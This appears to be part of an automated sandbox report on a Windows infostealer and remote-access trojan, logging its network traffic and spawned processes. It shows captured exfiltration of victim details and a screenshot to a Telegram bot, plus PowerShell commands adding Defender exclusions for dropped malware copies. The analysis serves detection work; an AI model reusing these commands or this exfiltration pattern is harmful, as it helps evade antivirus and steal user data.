                                                                                                                                    2024-04-19 11:42:00 UTC89OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a
                                                                                                                                    Data Ascii: Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
                                                                                                                                    2024-04-19 11:42:00 UTC10OUTData Raw: 37 31 36 32 36 34 39 32 32 36
                                                                                                                                    Data Ascii: 7162649226
                                                                                                                                    2024-04-19 11:42:00 UTC131OUTData Raw: 0d 0a 2d 2d 33 37 35 61 38 32 61 39 2d 34 33 34 63 2d 34 33 64 30 2d 38 64 32 35 2d 63 30 63 63 64 38 31 36 63 63 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 61 70 74 69 6f 6e 0d 0a 0d 0a
                                                                                                                                    Data Ascii: --375a82a9-434c-43d0-8d25-c0ccd816cce2Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=caption
                                                                                                                                    2024-04-19 11:42:00 UTC102OUTData Raw: 49 44 3a 20 37 36 61 31 39 35 36 66 62 32 38 64 63 37 30 31 35 64 36 64 30 33 66 30 66 36 30 33 30 38 30 30 62 39 37 32 63 61 36 62 0a 55 73 65 72 6e 61 6d 65 3a 20 6a 6f 6e 65 73 0a 50 43 20 4e 61 6d 65 3a 20 30 36 35 33 36 37 0a 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0a 47 45 4f 3a 20 55 53 0a
                                                                                                                                    Data Ascii: ID: 76a1956fb28dc7015d6d03f0f6030800b972ca6bUsername: userPC Name: 065367IP: 81.181.57.52GEO: US
                                                                                                                                    2024-04-19 11:42:00 UTC146OUTData Raw: 0d 0a 2d 2d 33 37 35 61 38 32 61 39 2d 34 33 34 63 2d 34 33 64 30 2d 38 64 32 35 2d 63 30 63 63 64 38 31 36 63 63 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 70 68 6f 74 6f 3b 20 66 69 6c 65 6e 61 6d 65 3d 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 0d 0a 0d 0a
                                                                                                                                    Data Ascii: --375a82a9-434c-43d0-8d25-c0ccd816cce2Content-Disposition: form-data; name=photo; filename=screenshot.png; filename*=utf-8''screenshot.png
                                                                                                                                    2024-04-19 11:42:00 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    2024-04-19 11:42:01 UTC | 1520 | IN | HTTP/1.1 200 OK
                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:01 GMT
                                                                                                                                    Content-Type: application/json
                                                                                                                                    Content-Length: 1131
                                                                                                                                    Connection: close
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                    {"ok":true,"result":{"message_id":315,"from":{"id":6499149886,"is_bot":true,"first_name":"safaryarybot","username":"safaryarybot"},"chat":{"id":7162649226,"first_name":"ROOT","username":"almanroot","type":"private"},"date":1713526921,"photo":[{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADcwADNAQ","file_unique_id":"AQADj8ExG1DNEVF4","file_size":1202,"width":90,"height":72},{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADbQADNAQ","file_unique_id":"AQADj8ExG1DNEVFy","file_size":16115,"width":320,"height":256},{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADeAADNAQ","file_unique_id":"AQADj8ExG1DNEVF9","file_size":68054,"width":800,"height":640},{"file_id":"AgACAgQAAxkDAAIBO2YiWIn7FJh9FXqrmCxxweP_88cnAAKPwTEbUM0RURm_kLYCRuuGAQADAgADeQADNAQ","file_unique_id":"AQADj8ExG1DNEVF-","file_size":100422,"width":1280,"height":1024}],"caption":"ID: 76a1956fb28dc7015d6d03f0f6030800b972ca6b\nUsername: user\nPC Name: 065367\nIP: 81.181.57.52\nGEO: US","caption_entities":[{"offset":81,"length":12,"type":"url"}]}}


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    3 | 192.168.2.4 | 49749 | 34.117.186.192 | 443 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    2024-04-19 11:42:37 UTC | 61 | OUT | GET /ip HTTP/1.1
                                                                                                                                    Host: ipinfo.io
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-19 11:42:37 UTC | 361 | IN | HTTP/1.1 200 OK
                                                                                                                                    server: nginx/1.24.0
                                                                                                                                    date: Fri, 19 Apr 2024 11:42:37 GMT
                                                                                                                                    content-type: text/plain; charset=utf-8
                                                                                                                                    Content-Length: 12
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                    via: 1.1 google
                                                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
                                                                                                                                    2024-04-19 11:42:37 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                                                                    Data Ascii: 81.181.57.52


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                    4 | 192.168.2.4 | 49750 | 34.117.186.192 | 443 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    2024-04-19 11:42:38 UTC | 42 | OUT | GET /country HTTP/1.1
                                                                                                                                    Host: ipinfo.io



                                                                                                                                    Target ID:0
                                                                                                                                    Start time:13:41:53
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\user\Desktop\W4tW72sfAD.exe"
                                                                                                                                    Imagebase:0xa10000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1756102342.000000001303D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:13:41:56
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
                                                                                                                                    Imagebase:0x7ff791fa0000
                                                                                                                                    File size:2'759'232 bytes
                                                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:13:41:56
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:13:41:56
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
                                                                                                                                    Imagebase:0x7ff6f4260000
                                                                                                                                    File size:52'744 bytes
                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Imagebase:0xb90000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Imagebase:0x380000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:21
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Imagebase:0xed0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\Downloads\RuntimeBroker.exe, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:22
                                                                                                                                    Start time:13:41:58
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Imagebase:0x60000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:23
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:25
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:29
                                                                                                                                    Start time:13:42:00
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:30
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                    File size:452'608 bytes
                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:31
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:32
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:33
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
                                                                                                                                    Imagebase:0x7ff7a5cb0000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:34
                                                                                                                                    Start time:13:42:01
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:35
                                                                                                                                    Start time:13:42:02
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:chcp 65001
                                                                                                                                    Imagebase:0x7ff644fc0000
                                                                                                                                    File size:14'848 bytes
                                                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:36
                                                                                                                                    Start time:13:42:02
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\PING.EXE
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:ping -n 10 localhost
                                                                                                                                    Imagebase:0x7ff7b9570000
                                                                                                                                    File size:22'528 bytes
                                                                                                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:37
                                                                                                                                    Start time:13:42:06
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                                                    File size:496'640 bytes
                                                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:38
                                                                                                                                    Start time:13:42:08
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0x730000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:40
                                                                                                                                    Start time:13:42:13
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0x960000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 68%, ReversingLabs
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:41
                                                                                                                                    Start time:13:42:19
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                                                                    Imagebase:0x6b0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:44
                                                                                                                                    Start time:13:42:27
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0xfe0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:47
                                                                                                                                    Start time:13:42:30
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0x7ff7a5cb0000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:48
                                                                                                                                    Start time:13:42:30
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:49
                                                                                                                                    Start time:13:42:30
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Imagebase:0x570000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:51
                                                                                                                                    Start time:13:42:33
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                    File size:55'320 bytes
                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:52
                                                                                                                                    Start time:13:42:37
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                                                                    Imagebase:0x5b0000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
